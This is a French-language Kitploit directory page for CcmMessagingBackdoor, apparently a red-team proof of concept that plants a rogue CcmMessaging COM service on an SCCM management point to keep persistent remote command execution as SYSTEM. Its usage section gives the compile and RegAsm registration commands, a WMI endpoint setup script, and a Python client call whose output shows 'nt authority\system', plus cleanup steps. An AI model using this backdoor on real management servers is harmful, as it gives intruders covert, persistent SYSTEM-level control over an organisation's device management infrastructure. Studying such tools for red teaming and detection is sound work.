Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CcmMessagingBackdoor — Porte dérobée de preuve de concept pour le point de gestion SCCM utilisant un service COM malveillant pour l'exécution persistante de commandes à distance en tant que SYSTEM. | Kitploit
Outils/GitHubGitHub/synacktiv/ccmmessagingbackdoor
Mécanismes de PersistancePost-ExploitationCommandement et ContrôleRed TeamingOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubsynacktiv/ccmmessagingbackdoor

CcmMessagingBackdoor

Porte dérobée de preuve de concept pour le point de gestion SCCM utilisant un service COM malveillant pour l'exécution persistante de commandes à distance en tant que SYSTEM.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
1924il y a 1 anPas encore vérifié
Partager

CcmMessagingBackdoor

Outils de preuve de concept pour créer et installer un service CcmMessaging malveillant afin de conserver un accès sur un point de gestion.

Utilisation

  • Compiler et installer le service COM malveillant sur le point de gestion
root@kitploit:~
# Compile
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /t:library /out:c:\rogue.dll RogueCcmEndpoint.cs

# Register CLSID
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe /codebase c:\rogue.dll
  • Configurer le point de terminaison du service dans WMI
root@kitploit:~
PS C:\>  ./wmi_create_rogue_service_endpoint.ps1
  • Utiliser le client Python pour exécuter des commandes PowerShell
root@kitploit:~
$ python3 ccmmessaging_backdoor_client.py -t https://mp.corp.local -s MP_Backdoor 'whoami'
[...]
<BackdoorResponse>nt authority\system
</BackdoorResponse>
  • Pour nettoyer
root@kitploit:~
# Unregister CLSID
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe /unregister c:\rogue.dll

PS C:\> ./wmi_remove_rogue_service_endpoint.ps1

À faire

  • Corriger le crash aléatoire du processus CcmExec (raison inconnue pour le moment)
Télécharger l’outil